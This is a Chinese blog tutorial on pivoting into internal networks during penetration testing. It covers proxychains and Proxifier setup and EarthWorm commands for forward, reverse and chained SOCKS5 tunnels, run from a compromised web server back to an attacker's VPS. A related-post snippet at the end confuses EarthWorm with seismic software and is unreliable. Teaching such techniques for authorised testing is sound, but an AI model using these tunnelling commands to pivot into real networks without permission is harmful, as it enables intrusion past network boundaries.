内网代理以及Earthworm使用

于 2024-04-02 09:57:51 发布
阅读量685 收藏 10
点赞数 22
分类专栏: web安全 内网代理 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/137258080
版权
本文详细介绍了内网渗透中使用的代理技术,包括web服务扫描、代理隧道选择(如HTTP和SOCKS),以及在Windows和Linux环境下使用的proxychains和Earthworm工具,涵盖正向代理、反向代理以及二级代理的设置和实验步骤。
摘要由CSDN通过智能技术生成

内网代理介绍

内网代理介绍

内网资产扫描这种场景一般是进行内网渗透才需要的代理技术,如果你不打内网一般是不需要这种技术的,内网代理技术一般也是采用http或者socks代理

针对以上的情况我们需要如何对内网进行扫描呢?

1、直接使用web服务进行扫描(这种方式请看内网渗透)

2、做代理让web服务成为代理机器

针对于内网的机器要考虑是用代理隧道还是使用端口转发

在这种情况需要用什么工具走代理呢?

1、扫描工具

2、浏览器

3、burp

使用代理一般是用http代理或者socks代理代理后的

代理连接工具

windows工具

如果是windows是proxyifile工具

1、运行软件然后点进进行一步一步安装

2、安装完成运行软件

3、打开代理服务器配置,可以看到支持http和socks代理

4、该工具支持代理链,代理链可以支持多级代理

linux工具

linux工具下一般使用命令行工具proxychains

1、该工具在kali中自带我们看一下安装步骤

2、下载Proxychains源码,可以从GitHub上下载,https://github.com/rofl0r/proxychains-ng,我已经下载好了

3、解压文件然后进行安装

tar zxvf proxychains-ng-4.17.tar.gz
cd proxychains-ng-4.17
./configure
make
make install

4、安装完成之后,先将proxychains.conf文件复制到/usr/local/etc/

5、需要修改配置文件/usr/local/etc/proxychains.conf,将其中的代理服务器修改为你的代理服务器

6、修改完成之后,可以使用proxychains命令来使用代理服务器,示例

proxychains4 curl www.baidu.com

Earthworm使用

Earthworm简介

Earthworm简称EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透

该工具已经停止维护和下载:EarthWorm

该工具支持端口转发,正向代理,反向代理,多级代理等方式,可以打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制

接下来我们学习一下

下载地址;https://github.com/idlefire/ew

(一级代理)正向代理

正向意思就是攻击者可以访问目标的机器,也就意味着目标的机器在公网

正向连接就是黑客主动连接web服务器,在web开启监听

web服务器执行如下命令

ew_for_win -s ssocksd -l 1080

黑客的电脑使用froxyifile或者proxychains等工具进行连接

实验步骤

1、使用漏洞将web服务器控制下来然后上传ew工具执行开启监听

ew_for_win -s ssocksd -l 1080

2、使用proxyifile连接

3、配置代理规则

4、使用工具测试

5、测试linux

(一级代理)反向代理

反向连接适合于目标没有公网 IP 的情况,这时就需要一台公网 vps 了,这里就直接以内网地址作为演示了

VPS执行如下

ew -s rcsocks -l 1080 -e 4444

目标器执行如下

ew -s rssocks -d vps -e 4444

这条命令表示在本地开启 socks 5 服务,并反弹到 vps 的 4444 端口,如果代理建立成功,在 VPS 端就会看到 rssocks cmd_socket OK! 的提示

在黑客的机器上使用工具连接VPS的1080端口

实验步骤

1、先在VPS上开启监听

ew_for_win -s rcsocks -l 1080 -e 4444

2、然后再靶机上连接VPS

ew_for_win -s rssocks -d 192.168.1.9 -e 4444

3、在黑客电脑上使用工具连接

(二级代理)正向连接二级代理

二级代理发生在如下的情况

1、web服务器在公网黑客可以访问

2、B机器在内网黑客不能访问

3、web服务器只能访问B机器

4、B机器可以访问内网机器

这种昂情况使用二级正向代理

在B主机上执行

ew -s ssocksd -l 4444

在web服务器上执行

ew -s lcx_tran -l 1080 -f B -g 4444

黑客使用工具连接web服务器的1080端口从而实现访问内网机器

实验步骤

1、在内网的机器B上执行命令

ew_for_win -s ssocksd -l 4444

2、在web机器上执行如下命令

ew_for_win -s lcx_tran -l 1080 -f 192.168.1.8 -g 4444

3、测试代理

(二级代理)反向连接

1、web服务器在内网可以访问VPS

2、内网机器B在内网不能访问VPS可以访问web服务

vps

ew_for_win -s lcx_listen -l 1080 -e 4444

主机B

ew_for_win -s ssocksd -l 5555

主机A

ew_for_win -s lcx_slave -d 192.168.1.8 -e 4444 -f 192.168.36.130 -g 5555
乐队1
关注
  • 22
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(十五)之 Earthworm使用(二级代理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
07-30 1231
本文紧接着上一篇文章继续讲解Earthworm工具的使用
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web...
EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 1579
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
实操EarthWorm代理工具的使用
最新发布
lxz021202的博客
03-25 807
实操ew代理工具的使用方法,包括正反代理和单一或双重代理
基于EarthWorm的正反向socks5代理
good good study
02-08 4138
EarthWorm是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处
内网内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 4669
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
earthworm全套.zip
10-14
包含全套earthworm服务器、客户端。EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条...
使用Earthworm (EW) 做Socks5代理
01-09
正向代理 1.选择合适的ew文件(将文件ew_…改为ew.exe,为了在命令行少敲几个字母),上传到边缘服务器 2.边缘服务器输入 ew.exe -s ssocksd -l 8000 3.可借助proxifier工具配置攻击机整台机器的代理(proxifier添加...
EW(Earthworm
06-08
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
EarthWorm_WORM_
09-29
Worm Chinese..... penetrate upto last
Xshell+Xftp通过代理的方式访问局域网内网服务器
guxiaohai_的博客
11-14 1800
所以在网上找了下教程,最后结合网上的,在Xshell上面设置代理直接访问其它服务器,Xftp也是如此,当然它的原理也是利用公网服务器做跳转,不过所有操作都是Xshell 完成,不需要我们手动去跳。最近在部署项目时遇到只有1台服务器拥有公网ip,其它服务器只有局域网ip,当然其它服务器可以正常访问网络,例如如下模型。步骤1:名称(备注自定义),协议(SSH),主机(局域网服务器IP),端口号(默认22)步骤1:名称(备注自定义),协议(SSH),主机(公网服务器IP),端口号(默认22)
公司内网下Conda和pip 代理配置
weixin_43122007的博客
01-11 1144
公司内网下Conda和pip 代理配置
[内网渗透]—内网穿透
Sentiment的博客
12-08 1519
这几个概念其实是比较难区分的,特别是和后面的内网穿透混在一起,在宏观上说,他们差别不大。
内网穿透大杀器--EarthWorm
热门推荐
大方子
08-24 2万+
0x00 前言如果感觉本文对你有帮助,请在文章末尾点个赞,谢谢表哥们支持! 当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了? 不来一次内网漫游,渗透是不完整的,哈哈。 本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。 它强在哪些方面呢? 1.可穿...
EW(EarthWorm) 反向 socks5 代理
为之的博客
12-14 1621
今天本想对学校的内网服务器进行人生中第一次横向渗透,奈何情况不允许,但好歹学习了一些东西,总要写下来保存 工具: EW:https://github.com/idlefire/ew proxychains:https://github.com/rofl0r/proxychains-ng 小米随身wifi:http://bigota.miwifi.com/xiaoqiang/miniwifi/miwifi_setup_1b601_848.exe phpstudy:https://m.x...
EarthWorm 常用命令总结
lweiheng blog
12-28 3172
EarthWorm 常用命令总结 文章目录EarthWorm 常用命令总结0 介绍1 命令详解2 使用实例2.1 建立ssocks5代理2.2 反弹ssocks5代理2.3 端口转发 0 介绍 EarthWorm内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。 为实现这些功能,EarthWorm建立了六大功能模块。 分别是 ssocksd , rcsocks , rssocks , l...
内网代理工具--EarthWorm
浅笑996的博客
06-29 2022
一、简介 EarthWorm内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。 为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。 从三项功能的角度可以这样划分 功能名称 对应模块 正向代理 ssocksd 反向代理 rcsoc...
渗透测试之反弹代理(socks代理) (Earthworm工具) (windows和linux中的代理
broing55的博客
03-18 2149
反弹代理 内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。 所以出现了反弹代理,也叫反弹socket。 使用工具:ew,支持http,https等代理 Socks代理 全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp...
earthworm的linux使用
03-27
作为人工智能语言模型,我无法在Linux上使用Earthworm软件,但我可以告诉您如何在Linux系统上安装和使用Earthworm软件。 安装Earthworm软件 1. 下载Earthworm软件包,可以从官网或Github上获取最新版本。 2. 解压缩Earthworm软件包,可以使用tar命令进行解压缩。 3. 进入解压缩后的Earthworm目录,使用make命令进行编译和安装。 4. 在安装过程中,可以根据需要选择安装Earthworm的各个模块和插件。 使用Earthworm软件 1. 在启动Earthworm之前,需要先配置Earthworm环境变量,可以将Earthworm的bin目录添加到系统的PATH环境变量中。 2. 启动Earthworm服务,可以使用ewd命令启动Earthworm daemon进程。 3. 使用各个Earthworm模块和插件,可以根据需要进行配置和启动。 4. 查看Earthworm日志和输出信息,可以使用ewlog命令查看Earthworm日志文件,使用ewcmd命令查看Earthworm模块和插件的输出信息。 需要注意的是,Earthworm软件是一个高级的地震数据处理系统,需要一定的专业知识和经验才能够正确地使用。在使用Earthworm软件时,请务必仔细阅读相关文档和使用说明,以免造成不必要的损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值